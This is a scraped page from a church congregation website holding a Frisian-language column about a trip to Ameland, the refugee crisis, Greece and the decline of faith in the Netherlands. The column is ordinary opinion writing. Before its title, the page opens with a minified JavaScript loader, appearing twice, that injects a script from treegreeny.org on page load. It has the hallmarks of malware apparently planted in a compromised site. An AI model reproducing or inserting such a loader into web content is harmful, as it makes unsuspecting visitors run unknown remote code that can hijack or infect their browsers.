;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Amelân - PKN Damwâld

Amelân

Gepubliceerd op: vrijdag 30 september 2016

Krekt in oere thús, wy hiene in pear dagen nei It Amelân west en de krantekoppen ha jo alwer yn’e besnijing. Ekonomyske krisis, de flechtelingekrisis en as toppunt it nijs dat God (hast) ferdwynt út ús lân! It is noch net salang ferlyn, dat wy de Grieken de wacht oansein ha. Dy libje der mar op los dêr yn it suden fan Europa en wy mar betelje, sa wie it kredo! O, o it wie net bêst!  En no, in jier letter litte wy dyselde Grieken  fersûpe yn’e flechtlingen…….
Sels ûnder saneamde kristenen libbet it idee dat  Nederlân fan ús is en dat ús noarmen en wearden yn gefaar binne mei dy minsken, de flechtlingen dus. My tinkt, wy meie bliid wêze dat wy hjir berne bin, yn dit lân, mar dat it echt fan ús is, o nee, dat is der fier by troch. Der is mar ien folk dat syn lân yn besit krigen hat……!  Boppedat, wat soe it hjir yn Fryslân wer drok wurde as alle Friezen wer werom  kamen, dy’t (om ekonomyske redenen!) emigrearre binne……
Dêrom liket it my it bêste dat de trainingsbroek útgiet, de kapusjon óf en de hannen wer út de mouwen, mei-inoar derfoar! O ja, as jo God út jo libben triuwe, sa freegje ik mei ôf, hoe kin jo dan yn noed sitte oer ús noarmen en wearden? En ús ekonomy, dat komt fêst wol wer goed. Wy meie ommers aanst wer seis dagen yn ’e wike oan it wurk (!) en de sânde dei, dy bliuwt oer foar de “leuke”dingen ! Shoppe dus, al sil it ek yn in tsjerke wêze!  It kin no noch!

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns